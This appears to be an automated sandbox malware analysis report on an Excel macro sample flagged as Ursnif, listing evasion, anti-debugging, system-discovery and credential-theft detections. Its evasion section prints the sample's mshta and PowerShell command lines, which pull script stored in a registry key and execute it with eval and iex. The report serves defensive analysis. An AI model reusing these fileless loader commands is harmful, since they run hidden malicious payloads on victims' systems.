Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion:

barindex
Contains long sleeps (>= 3 min)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 3155
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 2839
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 2541
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 2100
Found dropped PE file which has not been started or loaded
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\WJ8I2OL4\app[1].dll Jump to dropped file
Found evasive API chain (date check)
Source: C:\Windows\SysWOW64\regsvr32.exe Evasive API call chain: GetSystemTimeAsFileTime,DecisionNodes
Found evasive API chain checking for process token information
Source: C:\Windows\SysWOW64\regsvr32.exe Check user administrative privileges: GetTokenInformation,DecisionNodes
May sleep (evasive loops) to hinder dynamic analysis
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 5644 Thread sleep count: 32 > 30 Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 5644 Thread sleep count: 49 > 30 Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 5644 Thread sleep count: 41 > 30 Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 5644 Thread sleep count: 38 > 30 Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2156 Thread sleep time: -1667865539s >= -30000s Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2156 Thread sleep count: 62 > 30 Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2156 Thread sleep count: 45 > 30 Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2156 Thread sleep count: 88 > 30 Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 5752 Thread sleep count: 84 > 30 Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 5752 Thread sleep count: 56 > 30 Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 5752 Thread sleep count: 39 > 30 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4672 Thread sleep time: -6456360425798339s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4724 Thread sleep count: 2541 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5324 Thread sleep time: -6456360425798339s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 68 Thread sleep count: 2100 > 30
Sample execution stops while process was sleeping (likely an evasion)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Last function: Thread delayed
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Last function: Thread delayed
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\regsvr32.exe Process information queried: ProcessInformation Jump to behavior

Anti Debugging:

barindex
Enables debug privileges
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug

HIPS / PFW / Operating System Protection Evasion:

barindex
Creates a process in suspended mode (likely to inject code)
Source: C:\Windows\System32\mshta.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').UtilTool))
Source: C:\Windows\System32\mshta.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').UtilTool))
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\zctvvvtu\zctvvvtu.cmdline'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\a2r2fkec\a2r2fkec.cmdline'
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process created: unknown unknown
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process created: unknown unknown
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Source: unknown Process created: C:\Windows\System32\mshta.exe 'C:\Windows\System32\mshta.exe' 'about:<hta:application><script>Copx='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(Copx).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\86EC23E5-2D5A-A875-E71A-B15C0BEE7550\\\DeviceFile'));if(!window.flag)close()</script>'
Source: unknown Process created: C:\Windows\System32\mshta.exe 'C:\Windows\System32\mshta.exe' 'about:<hta:application><script>Hl1h='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(Hl1h).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\86EC23E5-2D5A-A875-E71A-B15C0BEE7550\\\DeviceFile'));if(!window.flag)close()</script>'
Yara detected Xls With Macro 4.0
Source: Yara match File source: app.xml, type: SAMPLE
Source: regsvr32.exe, 00000003.00000002.590086971.0000000002FD0000.00000002.00000001.sdmp, regsvr32.exe, 00000013.00000002.585926396.0000000003640000.00000002.00000001.sdmp, powershell.exe, 00000025.00000002.586261985.0000028656DD0000.00000002.00000001.sdmp, powershell.exe, 00000027.00000002.585702910.000002B5ABD70000.00000002.00000001.sdmp, csc.exe, 0000002F.00000002.583539215.000001E9AEB40000.00000002.00000001.sdmp, csc.exe, 00000030.00000002.583966297.0000021D92F30000.00000002.00000001.sdmp Binary or memory string: Program Manager
Source: regsvr32.exe, 00000003.00000002.590086971.0000000002FD0000.00000002.00000001.sdmp, regsvr32.exe, 00000013.00000002.585926396.0000000003640000.00000002.00000001.sdmp, powershell.exe, 00000025.00000002.586261985.0000028656DD0000.00000002.00000001.sdmp, powershell.exe, 00000027.00000002.585702910.000002B5ABD70000.00000002.00000001.sdmp, csc.exe, 0000002F.00000002.583539215.000001E9AEB40000.00000002.00000001.sdmp, csc.exe, 00000030.00000002.583966297.0000021D92F30000.00000002.00000001.sdmp Binary or memory string: Shell_TrayWnd
Source: regsvr32.exe, 00000003.00000002.590086971.0000000002FD0000.00000002.00000001.sdmp, regsvr32.exe, 00000013.00000002.585926396.0000000003640000.00000002.00000001.sdmp, powershell.exe, 00000025.00000002.586261985.0000028656DD0000.00000002.00000001.sdmp, powershell.exe, 00000027.00000002.585702910.000002B5ABD70000.00000002.00000001.sdmp, csc.exe, 0000002F.00000002.583539215.000001E9AEB40000.00000002.00000001.sdmp, csc.exe, 00000030.00000002.583966297.0000021D92F30000.00000002.00000001.sdmp Binary or memory string: Progman
Source: regsvr32.exe, 00000003.00000002.590086971.0000000002FD0000.00000002.00000001.sdmp, regsvr32.exe, 00000013.00000002.585926396.0000000003640000.00000002.00000001.sdmp, powershell.exe, 00000025.00000002.586261985.0000028656DD0000.00000002.00000001.sdmp, powershell.exe, 00000027.00000002.585702910.000002B5ABD70000.00000002.00000001.sdmp, csc.exe, 0000002F.00000002.583539215.000001E9AEB40000.00000002.00000001.sdmp, csc.exe, 00000030.00000002.583966297.0000021D92F30000.00000002.00000001.sdmp Binary or memory string: Progmanlock

Language, Device and Operating System Detection:

barindex
Contains functionality to query CPU information (cpuid)
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 3_2_001E4454 cpuid 3_2_001E4454
Queries the installation date of Windows
Source: C:\Windows\SysWOW64\regsvr32.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion InstallDate Jump to behavior
Queries the volume information (name, serial number etc) of a device
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 3_2_001E6B0F HeapCreate,GetTickCount,GetSystemTimeAsFileTime,SwitchToThread,_aullrem,Sleep,IsWow64Process, 3_2_001E6B0F
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 3_2_001E4454 wsprintfA,RtlAllocateHeap,GetUserNameW,RtlAllocateHeap,GetUserNameW,HeapFree,GetComputerNameW,GetComputerNameW,RtlAllocateHeap,GetComputerNameW,HeapFree, 3_2_001E4454
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 3_2_001E4C1B CreateEventA,GetVersion,GetCurrentProcessId,OpenProcess,GetLastError, 3_2_001E4C1B
Source: C:\Windows\SysWOW64\regsvr32.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid Jump to behavior

Stealing of Sensitive Information:

barindex
Yara detected Ursnif
Source: Yara match File source: 19.3.regsvr32.exe.56b94a0.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 3.3.regsvr32.exe.4d894a0.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000013.00000003.508793933.0000000005738000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000013.00000003.508759247.0000000005738000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000013.00000003.508819476.0000000005738000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.411957077.0000000004E08000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000013.00000003.508778168.0000000005738000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.411794580.0000000004E08000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.411858229.0000000004E08000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.411885260.0000000004E08000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.472132410.0000000004B0E000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000013.00000003.531333562.000000000553C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000013.00000003.508710785.0000000005738000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.411972809.0000000004E08000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.429184025.0000000004C0C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.428651984.0000000004D89000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000013.00000003.520271501.00000000056B9000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000013.00000003.508809489.0000000005738000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.411764136.0000000004E08000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.411824879.0000000004E08000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000013.00000003.508736134.0000000005738000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000013.00000003.508679200.0000000005738000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.411905435.0000000004E08000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: regsvr32.exe PID: 5236, type: MEMORY

Remote Access Functionality:

barindex
Yara detected Ursnif
